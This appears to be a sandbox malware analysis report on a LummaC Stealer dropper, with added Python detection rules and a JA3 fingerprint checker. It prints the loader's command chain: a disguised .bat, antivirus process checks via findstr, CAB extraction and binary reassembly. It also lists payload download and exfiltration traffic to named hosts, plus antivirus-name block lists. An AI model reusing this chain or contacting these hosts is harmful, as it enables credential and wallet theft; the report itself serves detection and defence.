
Windows Analysis Report
setup.exe

Overview

General Information

Sample name: setup.exe
Analysis ID: 1663247
MD5: 3b5fc901b53fe3e365071f6c8beee90b
SHA1: 3ec302af41f69d8d57d35bba3a40570bd3c13110
SHA256: 1717f135b5854ecc4dfc8230c30234a2ab60020954d7c5e44ea4dcf268d52b13
Tags: AutoIT, exe, LummaStealer, user-aachum

Detection

LummaC Stealer
Score: 92
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • setup.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: 3B5FC901B53FE3E365071F6C8BEEE90B)
    • cmd.exe (PID: 7900 cmdline: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8084 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 8104 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7532 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7572 cmdline: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7560 cmdline: cmd /c md 826825 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7584 cmdline: extrac32 /Y /E Mods.vob MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 1008 cmdline: findstr /V "Previously" Mean MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5340 cmdline: cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 3484 cmdline: cmd /c copy /b ..\Fake.vob + ..\Shock.vob + ..\Examples.vob + ..\Why.vob + ..\Girl.vob + ..\Error.vob + ..\Protective.vob g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Motion.com (PID: 5672 cmdline: Motion.com g MD5: 62D09F076E6E0240548C2F837536A46A)
        • WerFault.exe (PID: 7560 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 1912 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • choice.exe (PID: 3000 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
    Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 7764, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, ProcessId: 7900, ProcessName: cmd.exe

    HIPS / PFW / Operating System Protection Evasion

    Source: Process started | Author: Joe Security | Data: Command: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , CommandLine: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7900, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn" , ProcessId: 7572, ProcessName: findstr.exe
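The process tree and the two Sigma matches above ("Search for Antivirus process" and "Suspicious Copy From or To System Directory") show the loader chain as a sequence of living-off-the-land steps: a .vob renamed to .bat and run, tasklist piped into findstr for security-product names, extrac32 expanding a CAB with a fake extension, copy /b stitching fragments into Motion.com (the AutoIt interpreter) and into the script "g", then "Motion.com g". Each step is weak evidence on its own; several of them under one root process is the pattern. The following is an added detection example, not code from Joe Sandbox or from this report. The events are constructed from the command lines in the process tree above (plus one benign control event), and the rule names, field names and thresholds are my own.

```python
import re

# Constructed process-creation events. Command lines and PIDs follow the
# process tree in this report; the last event is a benign control added here.
SAMPLE_EVENTS = [
    {"pid": 7764, "ppid": 1000, "image": r"C:\Users\user\Desktop\setup.exe",
     "cmd": r'"C:\Users\user\Desktop\setup.exe"'},
    {"pid": 7900, "ppid": 7764, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c copy Queens.vob Queens.vob.bat & Queens.vob.bat'},
    {"pid": 8084, "ppid": 7900, "image": r"C:\Windows\SysWOW64\tasklist.exe", "cmd": "tasklist"},
    {"pid": 8104, "ppid": 7900, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmd": 'findstr /I "opssvc wrsa"'},
    {"pid": 7572, "ppid": 7900, "image": r"C:\Windows\SysWOW64\findstr.exe",
     "cmd": 'findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"'},
    {"pid": 7584, "ppid": 7900, "image": r"C:\Windows\SysWOW64\extrac32.exe",
     "cmd": "extrac32 /Y /E Mods.vob"},
    {"pid": 5340, "ppid": 7900, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmd": r"cmd /c copy /b 826825\Motion.com + Elephant + Diabetes + Severe + Tears + Slovakia + Laser + Vocal + Defend + Mixing 826825\Motion.com"},
    {"pid": 5672, "ppid": 7900, "image": r"C:\Users\user\AppData\Local\Temp\826825\Motion.com",
     "cmd": "Motion.com g"},
    {"pid": 3000, "ppid": 7900, "image": r"C:\Windows\SysWOW64\choice.exe", "cmd": "choice /d y /t 5"},
    {"pid": 4242, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /c copy report.docx backup\report.docx"},   # benign control (constructed)
]

# Security-product process names the sample greps for (taken from its findstr command lines).
AV_PROCESS_NAMES = {"opssvc", "wrsa", "sophoshealth", "bdservicehost",
                    "avastui", "avgui", "nswscsvc", "ekrn"}
EXEC_EXTS = (".com", ".exe", ".scr", ".pif")


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def rule_av_process_discovery(ev):
    """findstr looking for security-product process names (the tasklist | findstr idiom)."""
    return _basename(ev["image"]) == "findstr.exe" and any(
        name in ev["cmd"].lower() for name in AV_PROCESS_NAMES)


def rule_nonscript_to_bat(ev):
    """copy X.ext X.ext.bat & X.ext.bat: a non-script file renamed and immediately run as batch."""
    return re.search(r"\bcopy\s+(\S+)\s+\1\.bat\s*&\s*\1\.bat", ev["cmd"], re.I) is not None


def rule_copy_b_reassembly(ev):
    """copy /b a + b + c ... target, where the target carries an executable extension."""
    m = re.search(r"\bcopy\s+/b\s+(.*)$", ev["cmd"], re.I)
    if not m:
        return False
    parts = m.group(1).split("+")
    tail = parts[-1].split()
    target = tail[-1].lower() if tail else ""
    return len(parts) >= 3 and target.endswith(EXEC_EXTS)


def rule_extrac32_nonstandard_archive(ev):
    """extrac32 expanding an archive whose name does not end in .cab."""
    if _basename(ev["image"]) != "extrac32.exe":
        return False
    args = [t for t in ev["cmd"].split()[1:] if not t.startswith("/")]
    return any(not a.lower().endswith(".cab") for a in args)


def rule_temp_com_execution(ev):
    """A .com/.scr/.pif launched from the user's Temp directory (the rebuilt AutoIt interpreter here)."""
    img = ev["image"].lower()
    return "\\appdata\\local\\temp\\" in img and img.endswith((".com", ".scr", ".pif"))


RULES = {
    "av_process_discovery": rule_av_process_discovery,
    "nonscript_to_bat": rule_nonscript_to_bat,
    "copy_b_reassembly": rule_copy_b_reassembly,
    "extrac32_nonstandard_archive": rule_extrac32_nonstandard_archive,
    "temp_com_execution": rule_temp_com_execution,
}


def evaluate(events):
    """Return (rule_id, pid) for every event that trips a rule."""
    return [(rid, ev["pid"]) for ev in events for rid, fn in RULES.items() if fn(ev)]


def root_pid(events, pid):
    """Walk ppid links up to the topmost process we hold an event for."""
    parents = {ev["pid"]: ev["ppid"] for ev in events}
    while parents.get(pid) in parents:
        pid = parents[pid]
    return pid


def summarize(events):
    """Group tripped rules by the root of each process chain. Several distinct
    rules under one root is the loader pattern; one alone is weak evidence."""
    out = {}
    for rid, pid in evaluate(events):
        out.setdefault(root_pid(events, pid), set()).add(rid)
    return out


if __name__ == "__main__":
    for root, rules in summarize(SAMPLE_EVENTS).items():
        print(root, sorted(rules))
```

Keying the chain on PID alone is only safe inside one sandbox run: the tree above already shows PID 7560 reused (first by cmd.exe, later by WerFault.exe), so on real telemetry correlate on a start-time-qualified identifier such as Sysmon's ProcessGuid rather than the bare PID.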
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-04-11T16:19:35.216067+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49726 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:37.023467+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49727 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:38.253175+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49728 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:39.329777+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49729 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:43.488619+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:44.628501+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:45.925693+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:48.136603+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 172.67.133.158 | 443 | TCP
    2025-04-11T16:19:49.214451+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.62.250 | 443 | TCP


    AV Detection

    Source: setup.exe | Virustotal: Detection: 36%
    Source: setup.exe | ReversingLabs: Detection: 41%
    Source: Submitted Sample | Neural Call Log Analysis: 96.0%
    Source: setup.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49726 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49727 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49728 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49729 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.133.158:443 -> 192.168.2.4:49733 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.62.250:443 -> 192.168.2.4:49734 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Directory queried: number of queries: 1001
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00405B6C FindFirstFileW,FindClose,0_2_00405B6C
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_0040652D DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_0040652D
    Source: global traffic | HTTP traffic detected: GET /shark.bin HTTP/1.1 | Connection: Keep-Alive | Host: h1.mockupeastcoast.shop
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 172.67.133.158:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49726 -> 172.67.133.158:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.133.158:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.62.250:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 172.67.133.158:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.133.158:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.133.158:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 172.67.133.158:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.133.158:443
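The nine Suricata alerts above all fire on one JA3 value, a0e9f5d64349fb13191bc781f81f42e1, which is the MD5 of a string built from the ClientHello (client version, cipher suites, extension types, supported groups, EC point formats, GREASE values dropped). JA3 identifies the TLS client library, not the destination, which is why every flow from this sample matches the same hash regardless of which Cloudflare-fronted host it talked to. The following is an added example, not code from the report or from Suricata: it builds a minimal ClientHello in memory (constructed bytes, not a capture from this run), derives the JA3 string and hash from it, and checks the hash against a blocklist that contains only the value reported above. The helper names and the blocklist structure are my own.

```python
import hashlib
import struct

KNOWN_BAD_JA3 = {
    # The JA3 MD5 reported in this analysis (matched by ET SID 2028371).
    "a0e9f5d64349fb13191bc781f81f42e1": "ET JA3 Hash - Possible Malware - Fake Firefox Font Update",
}


def _is_grease(v):
    """RFC 8701 GREASE values (0x0a0a, 0x1a1a, ..., 0xfafa) are excluded from JA3."""
    return (v & 0x0F0F) == 0x0A0A and (v >> 8) == (v & 0xFF)


def build_client_hello(version, ciphers, extensions):
    """Constructed helper: wrap a minimal ClientHello in a TLS record so the parser
    below can run offline. Not a capture from the sandbox run."""
    body = struct.pack("!H", version) + bytes(32) + b"\x00"        # version, random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"                                              # one compression method: null
    ext = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext)) + ext
    hs = b"\x01" + len(body).to_bytes(3, "big") + body               # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs         # record: handshake, legacy version


def ja3_from_client_hello(record):
    """Return (ja3_string, ja3_md5) for a TLS record carrying a ClientHello."""
    if len(record) < 6 or record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a ClientHello record")
    hs_len = int.from_bytes(record[6:9], "big")
    body = record[9:9 + hs_len]
    pos = 0
    version = struct.unpack_from("!H", body, pos)[0]; pos += 2
    pos += 32                                   # client random
    pos += 1 + body[pos]                        # session id
    cs_len = struct.unpack_from("!H", body, pos)[0]; pos += 2
    ciphers = [struct.unpack_from("!H", body, pos + i)[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                        # compression methods
    ext_types, curves, formats = [], [], []
    if pos + 2 <= len(body):
        end = pos + 2 + struct.unpack_from("!H", body, pos)[0]; pos += 2
        while pos + 4 <= end:
            etype, elen = struct.unpack_from("!HH", body, pos); pos += 4
            data = body[pos:pos + elen]; pos += elen
            ext_types.append(etype)
            if etype == 10 and len(data) >= 2:              # supported_groups
                n = struct.unpack_from("!H", data, 0)[0]
                curves = [struct.unpack_from("!H", data, 2 + i)[0] for i in range(0, n, 2)]
            elif etype == 11 and len(data) >= 1:            # ec_point_formats
                formats = list(data[1:1 + data[0]])

    def dashed(vals):
        return "-".join(str(v) for v in vals if not _is_grease(v))

    ja3 = ",".join([str(version), dashed(ciphers), dashed(ext_types), dashed(curves),
                    "-".join(str(f) for f in formats)])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def classify(record):
    """Return the blocklist rule name for the ClientHello's JA3, or None."""
    _, digest = ja3_from_client_hello(record)
    return KNOWN_BAD_JA3.get(digest)


if __name__ == "__main__":
    rec = build_client_hello(0x0303, [0x1301, 0x0A0A, 0xC02B],
                             [(0x0A0A, b""), (0, b""), (10, b"\x00\x04\x00\x1d\x00\x17"), (11, b"\x01\x00")])
    ja3, digest = ja3_from_client_hello(rec)
    print(ja3, digest, classify(rec))
```

The sample record carries a GREASE cipher and a GREASE extension, so the string comes out as 771,4865-49195,0-10-11,29-23,0 with both dropped. A JA3 match is a library fingerprint shared by every binary statically linked against the same TLS stack, so, as the Severity 3 on these alerts suggests, it is a pivot for hunting rather than a verdict on its own; here it is the HTTP POSTs to vqaliantheart.live behind the same hash that carry the weight.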
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 87 | Host: vqaliantheart.live
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=n4vdjxEAbOQtjO4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 19610 | Host: vqaliantheart.live
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=892U8OMjhfz9Crx | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 8767 | Host: vqaliantheart.live
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=E10M88dfdfAIG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 20410 | Host: vqaliantheart.live
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=h5dz5Qp3zbSGdY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 5450 | Host: vqaliantheart.live
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=j3fn2vIY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 2321 | Host: vqaliantheart.live
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=tt6tb21Ab7tY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 579537 | Host: vqaliantheart.live
    Source: global traffic | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 125 | Host: vqaliantheart.live
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: HpKmdADIFCrtC.HpKmdADIFCrtC
    Source: global traffic | DNS traffic detected: DNS query: vqaliantheart.live
    Source: global traffic | DNS traffic detected: DNS query: h1.mockupeastcoast.shop
    Source: unknown | HTTP traffic detected: POST /oniz HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 87 | Host: vqaliantheart.live
    Source: setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: setup.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: setup.exe | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: setup.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
    Source: setup.exe | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
    Source: setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: setup.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: setup.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
    Source: setup.exe | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
    Source: setup.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: setup.exe | String found in binary or memory: http://ocsp.comodoca.com0
    Source: setup.exe | String found in binary or memory: http://ocsp.digicert.com0A
    Source: setup.exe | String found in binary or memory: http://ocsp.digicert.com0C
    Source: setup.exe | String found in binary or memory: http://ocsp.digicert.com0X
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: setup.exe | String found in binary or memory: http://ocsp.sectigo.com0
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Amcache.hve.24.dr | String found in binary or memory: http://upx.sf.net
    Source: Motion.com, 00000011.00000000.1311789104.0000000000275000.00000002.00000001.01000000.00000007.sdmp, Defend.13.dr, Motion.com.1.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: setup.exe | String found in binary or memory: https://sectigo.com/CPS0
    Source: Mixing.13.dr, Motion.com.1.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: Motion.com.1.dr | String found in binary or memory: https://www.globalsign.com/repository/0
    Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00404B88 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404B88
    Source: C:\Users\user\AppData\Local\Temp\826825\Motion.com | Process Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_004033E9 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004033E9
    Source: C:\Users\user\Desktop\setup.exe | File created: C:\Windows\TravelingWrapping
    Source: C:\Users\user\Desktop\setup.exe | File created: C:\Windows\SummariesAdaptation
    Source: C:\Users\user\Desktop\setup.exe | File created: C:\Windows\PotteryDetection
    Source: C:\Users\user\Desktop\setup.exe | File created: C:\Windows\ShelterPrize
    Source: C:\Users\user\Desktop\setup.exe | File created: C:\Windows\DropFolk
    Source: C:\Users\user\Desktop\setup.exe | Code function: 0_2_00406947
